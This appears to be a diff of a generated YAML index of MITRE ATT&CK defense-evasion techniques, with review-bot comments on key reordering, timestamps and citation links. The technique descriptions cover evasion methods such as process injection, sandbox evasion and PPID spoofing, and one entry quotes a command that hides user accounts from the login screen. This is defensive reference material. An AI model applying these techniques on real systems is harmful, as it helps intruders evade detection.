- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1036.004:
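Review bot: almost all of this hunk is reordering of `external_references` (the CERT-EU, GentilKiwi and ADSecurity entries move but keep their text), which makes the one substantive change easy to miss: the GentilKiwi `url` now points at a web.archive.org snapshot of blog.gentilkiwi.com and its retrieval date becomes September 12, 2024. `revoked: false` is a new key, and `x_mitre_modified_by_ref` is re-added at the end after being removed from its earlier position in the previous hunk, so nothing is lost. If the generator can emit list entries in a stable order, diffs like this one would be far easier to review.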
@@ -7225,7 +7342,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests: []
T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests: []
T1553.005:
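Review bot: T1647 keeps `x_mitre_attack_spec_version: 2.1.0` (the context line above the deletion) while only `spec_version` is removed, so after this patch objects in the same file sit at 2.1.0, 3.1.0 and 3.2.0. That mix is plausible if the values mirror upstream object by object, but it means `x_mitre_attack_spec_version` cannot be used as a file-level format indicator; worth a sentence in the PR description.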
@@ -7453,7 +7566,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests: []
T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests: []
T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
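Review bot: this hunk deletes the whole head of the T1497 object (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`) and the object is reassembled in the three hunks that follow, so the diff must be read as a reorder rather than a removal. Checking field by field: platforms, domains, contributors, id, type, created and created_by_ref all reappear with identical values; `external_references` reappears with the Unit 42 and Deloitte entries swapped and the Deloitte URL and retrieval date changed; `x_mitre_deprecated: false` and `revoked: false` are new. The only change in this hunk itself is `modified`, now `2024-09-12T15:50:18.049Z`.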
@@ -7913,6 +7989,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
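Review bot: the Deloitte Environment Awareness `url` gains a `/edit` suffix (`https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`) with the retrieval date updated to September 13, 2024. On Google Drive the `/edit` form is the editor URL, whereas the previous bare file URL was the one readers without edit rights are normally given; please confirm the new link resolves for an anonymous visitor, or keep the previous form. The same URL change is made for T1497.002 further down, so whichever form is chosen should be applied to both.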
@@ -7989,7 +8094,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8027,68 +8132,72 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests: []
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
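Review bot: the description gains a third paragraph on user-agent filtering, cited to the new `Trellix-Qakbot` reference that is added to `external_references`, and `x_mitre_version` goes from 1.1 to 1.2 to match, so citation and reference are consistent. What does not change is `x_mitre_data_sources` (`Process: Process Creation`, `Command: Command Execution`), neither of which would observe server-side user-agent checks; that is an upstream ATT&CK content question rather than something to fix in this generated file, but worth noting if this repository feeds detection coverage mapping. The remainder of the hunk is key reordering (`x_mitre_detection`, `kill_chain_phases`, data sources, defense bypassed, the FireEye references) with identical values, and `spec_version` is dropped as elsewhere.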
@@ -8146,7 +8255,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests: []
T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
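Review bot: `spec_version: '2.1'` is dropped from this object (and from every other object in the patch) while `x_mitre_attack_spec_version` jumps from 2.1.0 to 3.2.0 and `type`, `id`, `created`, `revoked` and the full `external_references` list are re-emitted in a different key order. That is a generator change, not an ATT&CK content change, and it belongs in the PR description: any consumer that reads these blocks as STIX 2.1 objects will now see them without the `spec_version` property, and the key reshuffle buries the one real edit in this hunk, the new `Deloitte Environment Awareness` citation. Sorting keys on output would keep future syncs to content-only diffs. That citation's URL is a Google Drive `/edit` link, so confirm it is world-readable before relying on it as a reference.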
@@ -8736,7 +8838,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
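Review bot: `modified` moves backwards here, from `2022-05-24T14:00:00.188Z` to `2022-05-03T02:15:42.360Z`, and the same happens for most of the other `modified` lines in this patch; every removed value ends in `T14:00:00.188Z`, which looks like a bundle-level timestamp stamped onto each object rather than the object's own `modified`. If the new values are the per-object timestamps from the upstream STIX data, state that in the PR description, because anything that compares `modified` to decide whether a technique was updated will treat these as no-ops or as rollbacks. If the old values were the correct ones, the sync is pulling from an older bundle and this should not merge.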
@@ -8761,7 +8863,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
